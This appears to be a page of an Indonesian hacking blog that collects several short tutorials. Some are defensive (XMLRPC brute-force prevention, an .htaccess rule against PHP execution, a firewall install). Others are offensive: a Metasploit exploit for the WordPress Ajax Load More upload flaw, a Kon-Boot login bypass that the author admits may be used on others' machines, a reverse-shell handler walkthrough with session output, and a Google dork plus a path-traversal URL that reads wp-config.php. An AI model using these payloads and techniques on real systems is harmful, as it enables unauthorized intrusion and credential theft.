Open top menu
Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts
Tuesday, November 3, 2015
no image


Yooshh.. jumpa lagi kali ini saya akan share tutorial Wordpress Ajax Load More PHP Upload Vulnerability. Exploit ini membutuhkan metasploit. Jadi yang belum install , bisa install dulu. Exploit source nya dari Exploit-DB .

Langsung saja ke tutorial.


Download Exploit nya disini : https://www.exploit-db.com/exploits/38660/


Tambahkan module diatas ke metasploit kalian . Jika masih ada yang bingung bisa lihat di artikel ini :





Ada opsi berikut di Exploit nya :

RHOST : isi dengan host dari target kalian.

TARGETURI : isi dengan path dimana wordpress berada. contoh /blog , /wordpress, atau bisa juga di root path nya .

WP_USERNAME : isi dengan username wordpress nya.

WP_PASSWORD : isi dengan password wordpress nya.



Untuk lebih jelasnya bisa lihat video nya di link berikut :


Wordpress Ajax Load More PHP Upload Vulnerability


Lalu bagaimana cara patch nya ?

Upgrade plugins kalian ke versi terbaru. Karena exploit ini hanya bisa sampai di versi 2.8.1.1





Sekian tutorial kali ini dan happy exploiting.

Read more
Wednesday, October 21, 2015
WordPress Security - Mencegah Brute Force pada XMLRPC Wordpress

Baru baru ini telah ditemukan trik bruteforce pada file xmlrpc.php CMS WordPress. Berbeda dengan bruteforce halaman login yang mungkin sudah diantisipasi dengan htaccess ataupun plugins, bruteforce pada file xmlrpc.php ini tidak berbekas.

Jika terdapat banyak log percobaan login saat kita mencoba bruteforce wp-login.php, bruteforce xmlrpc.php hanya meninggalkan satu log percobaan.




194.150.168.95 – – [07/Oct/2015:23:54:12 -0400] “POST /xmlrpc.php HTTP/1.1″ 200 14204 “-” “Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:1.7.5) Gecko/20041108 Firefox/1

WordPress XMLRPC Brute Force Tools Download







Nah , kalau cara bruteforce apsti sudah tau lah ya. Bisa baca baca disini.

Cara Brute Force.



Kali ini saya akan share cara mencegah nya. :




  1. 1. CloudFlare (pelanggan berbayar) sudah menyediakan layanan untuk melindungi XML-RPC dari serangan brute-force. Kalian bisa menggunakannya.

  2. 2. Menggunakan plugins security semacam WordPress Simple Firewall

  3. 3. Disable fungsi system.multicall pada file function.php

  4. 4. Jika kalian tidak menggunakan plugins yang membutuhkan xmlrpc, bisa juga dengan disable / rename saja file ini.






Sekian tutor kali ini semoga bermanfaat.
Read more
Wednesday, June 17, 2015
Bypass Login Windows / OSX dengan Kon-Boot via Flashdisk

Oke kali ini mau share aja barangkali ada yang butuh. Mungkin ada yang khilaf lupa password Windows nya . Atau barangkali ini tindakan illegal dengan membobol password Windows milik orang lain. Tools ini aman karena tidak mengubah data apapun termasuk tidak meng overwrite password lama kalian.

Bahan :

Download Kon-Boot

Target : Windows / OSX .

Alat :Flashdisk yang sudah terinstall Kon-Boot.



Ekstrak file yang kalian download diatas ke Flashdisk.

Masuk ke folder USB Install.

Install Kon-Boot di Flashdisk dengan meng-klik usb_install_RUNASADMIN .



Setting device Windows kalian agar booting via USB.

Tunggu sampai kon-boot melakukan booting dan meredirrect ke Windows kalian.

Login dengan password dikosongkan.

Dan bingo, kalian berhasil melakukan bypass login Windows.

Saran saya, jangan lakukan untuk kegiatan illegal.



Untuk kalian pengguna Nexus yang sudah terinstall Kali NetHunter, bisa juga menggunakan kon-boot yang memang sudah terinstall secara default.

Untuk video nya bisa dilihat disini :





Sekian tutor kali ini, selamat menunaikan ibadah puasa :)
Read more
Sunday, May 10, 2015
Tutorial Backconnect Menggunakan Metasploit

banyak cara untuk Backconnect, ada yang pakai netcat, weevely, dan kali ini saya akan share cara backconnect menggunakan Metasploit. Oke langsung saja ke tutorial nya .

Syarat : IP harus statis. Untuk IP dinamis akan gagal saat binding port nya soalnya.

Oke langsung ke praktik nya .

Buka terminal, masukkan command berikut :

jackwilder@system ~ % su -

root@system:~# msfconsole



Masukkan Command berikut :

msf > use exploit/multi/handler

msf exploit(handler) > set lhost  192.168.1.135 | untuk setting ip lokal kita

msf exploit(handler) > set lport 1337 | port yang akan digunakan untuk listening



Setelah itu kita lihat sevver OS pada korban, berhubung dia mengunakan 64bit, kita masukkan command

msf exploit(handler) > set payload linux/x64/shell/reverse_tcp

msf exploit(handler) > exploit



[*] Started reverse handler on 192.168.1.135:1337

[*] Starting the payload handler...








Setelah itu masuk ke shell kita.


Masuk menu Netsploit , pada menu backconnect masukkan ip lokal kita, dan port yang kita gunakan untuk listening.


Lalu klik connect





Now script try connect to 192.168.1.135 port 1337 ...



Balik lagi ke terminal kita.

[*] Started reverse handler on 192.168.1.135:1337 

[*] Starting the payload handler...

[*] Sending stage (38 bytes) to 192.168.1.135

[*] Command shell session 2 opened (192.168.1.135:1337 -> 192.168.1.135:38718) at 2015-05-10 22:24:47 +0700



Linux system 4.0.0-040000-generic #201504121935 SMP Sun Apr 12 23:36:33 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

uid=1(daemon) gid=1(daemon) groups=1(daemon)







Backconnect


Sekian tutor kali ini, semoga bermanfaat.

Read more
Saturday, April 25, 2015
Website Security | Disable PHP Execution in Website Directory using Htaccess

Sebenernya ini trik lama sih, buat arsip pribadi aja. Berhubung sering keluar masuk web orang tentu juga harus tau cara biar web sendiri gak dimasukin orang. (ngomong apa sih ? ) . Jadi biasanya kalo hacker bisa menembus halaman admins ebuah website, mereka akan mengumload backddoor berupa file .php di web kita sebagai akses masuk mereka.

Dan mas mas hacker biasa nya juga cukup pinter kok, kalo aggal upload file .php biasanya doi ganti ekstensi nya jadi .phtml , atau kalo mentok ya minimal upload file .html atau .txt ssebagai tanya kalo doi berhasil masuk ke web korban.

Ada cara mencegah nya ?

Ada lah pasti .

Sebagai contoh ane ambil cms wordpress.

Nah, direktori /uploads/ biasa nya yang sering jadi sasaran.

kalo pengen tau cara upload shell di wp, baca disini :

Bypass Upload Shell di Wordpress



Kita bisa mencegah agar file backdoor tersebut gagal dieksekusi.

Cara nya ?

buat file .htaccess di folder /uploads/ *folder silahkan tentuin sendiri.

isi nya :

<FilesMatch "(?i)\.(php|php3?|phtml|html|txt)$">

Order Deny,Allow

Deny from All

</FilesMatch>





Liat ss dibawah :




htaccess security

Saya coba testing di cpanel sendiri . :v

Disitu ada file .htaccess yang isi nya seperti di atas.

lalu ada file lol.php .

Kita lihat apa yang terjadi jika file lol.php tadi dibuka .




Folder Protected



scriptkiddies gonna kill you now :p



Sekian tutor kali ini dan semoga bermanfaat :D
Read more
Wednesday, April 15, 2015
Exploit Wordpress Plugin "WP Mobile Edition" Remote File Disclosure Vulnerability

Yupp, kali ini mau share lagi exploit pada Wordpress yang memiliki celah pada plugins WP Mobile Edition.

Plugin 'WP Mobile Edition' ini tidak memfilter parameter GET file di /themes/mTheme-Unus/css/css.php . Alhasil kita juga dapat melihat source dari konfigurasi Wordpress yang terletak di wp-config.php .

Oke langsung saja.

Google Dorks :

inurl:?fdx_switcher=mobile

Exploit :

127.0.0.1/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php



Tested on : BackBox Linux





Sekian tutor kali ini semoga bermanfaat.
Read more
Thursday, March 19, 2015
Menginstall Firewall di Ubuntu / backBox Linux

Linux tidak seperti Windows yang rentan virus. Sehingga Linux tidak butuh antivirus. Semua orang tau hal itu. Tapi kita juga perlu sadar kalau yang dapat membahayakan komputer kita bukan hanya virus.

Saat kita terkoneksi dengan internet akan ada banyak kemungkinan serangan yang terjadi. Oleh karena itu Linux tetap butuh Firewall.

Ada banyak cara untuk mengaktifkan firewall di linux, tapi kebanyakan susah karena kita harus setting manual config nya.

Oleh karena itu kali ini saya akan share cara menginstall firewall di Linux yang mudah digunakan.

Yaitu dengan GUFW .

GUFW adalah tampilan GUI dari UFW.

Cara installnya cukup mudah.

yuyudhn@anita:~$ sudo apt-get install gufw .

Kita tidak perlu menambahkan repository lagi karena sudah terinclude di repo default ubuntu.

Cara membuka nya cukupd engan perintah

yuyudhn@anita:~$ sudo gufw





Tinggal setting firewallnya menjadi ON.



Sekian tutorial kali ini semoga bermanfaat.
Read more